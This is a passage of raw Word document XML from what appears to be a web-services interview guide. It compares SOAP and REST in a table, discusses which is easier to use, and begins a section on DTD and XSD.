      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F7CF5"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API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a general concept of defining how software components interact, whereas </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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REST APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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E4B95"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62" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EF4CA8" w14:textId="0DF95B01" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00D05080">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="413" w:name="_Toc197867627"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between SOAP and REST</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="413"/>
    </w:p>
    <w:p w14:paraId="25F06A73" w14:textId="66FF5130" w:rsidR="002A079D" w:rsidRPr="00753240" w:rsidRDefault="002A079D" w:rsidP="003B6002">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00753240">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAns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CE4B95" w14:paraId="537287A8" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1330765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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4539137E"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SOAP (Simple Object Access Protocol)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39AD967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REST (Representational State Transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="598C3540" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BCB20D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rotocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AB84FD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a protocol with a set of rules for exchanging messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BDAF23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n architectural style, not a protocol, typically using HTTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="37A81422" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E3B45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Message Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="248A2A2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uses XML format for messages, which is strictly defined.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="637FC4A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multiple formats like JSON, XML, HTML, or plain text.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="10E925FD" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4619318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tate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F8E8F7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can be either stateful or stateless.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B23A1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tateless, meaning each request must contain all information for processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="256EDD32" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B631AD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munication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0408E82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operates over multiple protocols like HTTP, SMTP, TCP, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64BF9974"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operates only over HTTP/HTTPS protocols.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="232B09C4" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="292889C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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="133A5D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higher overhead due to its strict standards and XML-based messaging.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="411379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lightweight and faster due to its simple, text-based data formats like JSON.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="08794B54" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45225B20"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ecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="520EB9E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built-in security (WS-Security) for message integrity and confidentiality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19FFE17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relies on underlying protocols (e.g., HTTPS) for security.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="50A12324" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="304B98BA"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Transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F2EEEC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supports ACID-compliant transactions and complex messaging.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="268B7F58"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does not support built-in transactions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="5F44A618" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50CE03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Error Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A6B328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a built-in error handling mechanism (fault elements in XML).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D7D697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standard HTTP status codes (e.g., 404, 500) for error handling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="7F5DCEAF" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67A4BDB5"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plexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="360EC48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more complex and requires more setup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F96984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imple and easy to implement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="30EB795B" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CCF149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aching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F550EC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does not support caching as it typically uses complex operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D2433F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upports caching as it can take advantage of HTTP caching mechanisms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="0E4ADCF7" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="549B68F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lastRenderedPageBreak/>
              <w:t>Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6917459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best suited for enterprise-level applications, banking, payment gateways, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD68F7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ideal for web services, mobile apps, and web APIs with simple CRUD operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="690BB88F" w14:textId="77777777" w:rsidR="002A079D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006529AB">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8D9C893">
          <v:rect id="_x0000_i1963" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B43512" w14:textId="77777777" w:rsidR="002A079D" w:rsidRPr="00CE4B95" w:rsidRDefault="002A079D" w:rsidP="006529AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7964B553"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OAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a protocol with strict standards, uses XML, and is suited for complex, transactional, and secure services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D1D6E"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REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an architectural style that uses simple HTTP methods and is ideal for lightweight, stateless, and scalable web services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BA2BF0" w14:textId="25281183" w:rsidR="00631ACD" w:rsidRPr="00CE4B95"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64" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5BF107" w14:textId="10F8EB59" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75E3C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="414" w:name="_Toc197867628"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which among SOAP and REST is easy</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="414"/>
    </w:p>
    <w:p w14:paraId="46AE6FE8" w14:textId="1E74BD5C" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6"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generally considered </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>easier</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than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for the following reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07FF5C"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Simplicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DC2B5D"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lightweight and uses simple HTTP methods (GET, POST, PUT, DELETE) for operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67785870"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t typically uses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xml:space="preserve">, which is more compact and easier to work with than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used by SOAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE5AFBC"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ST does not require strict message structure or complex headers, making it easier to implement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C937A1E"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Ease of Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C09AED"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APIs are easier to understand and implement, especially for web services and mobile apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5804619E"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requires additional standards (such as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Secur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XML schema</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), which can make it more difficult to set up and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B21DD57"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Learning Curve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D351E83"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REST has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shorter learning curve</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it uses standard HTTP protocols and is based on simple principles (such as CRUD operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E03B25"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SOAP requires understand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SOAP headers</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can be more complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A49ACB8"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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0773E41E"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uses lightweight data formats like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which is more efficient in terms of performance and bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0402FB24"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uses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which is larger and requires more processing to parse, leading to higher overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016935F3"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Flexibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4762A6"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more flexible in terms of the types of data it can work with (e.g., JSON, XML, plain text).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A05D10"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is strict about us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as the message format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3F421"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1F1959BA" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>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typically easier to work with, more flexible, and simpler to implement, especially for web services and APIs.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on the other hand, is better suited for applications requiring high security, reliability, and complex transactions (such as banking or enterprise systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6C9C3" w14:textId="3B4C3E5B" w:rsidR="001456D8" w:rsidRPr="00CE4B95"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65" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="355DA496" w14:textId="41538E75" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="002753BC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="415" w:name="_Toc197867629"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What do you know about DTD and XSD</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="415"/>
    </w:p>
    <w:p w14:paraId="30EBA1CF" w14:textId="688622DA" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB"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6B977">
          <v:rect id="_x0000_i1966" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA4B3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B245B8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TD is a set of rules that define the structure and valid elements within an XML document. It was one of the first ways to define the structure of XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD89FF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ypes of DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D90AF"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nal DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defined within the XML document itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35246E21"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rnal DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defined in a separate file and linked to the XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1B8A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44370377" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178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DTD uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declarative syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for specifying valid elements, attributes, and their relationships.</w:t>
      </w:r>
    </w:p>
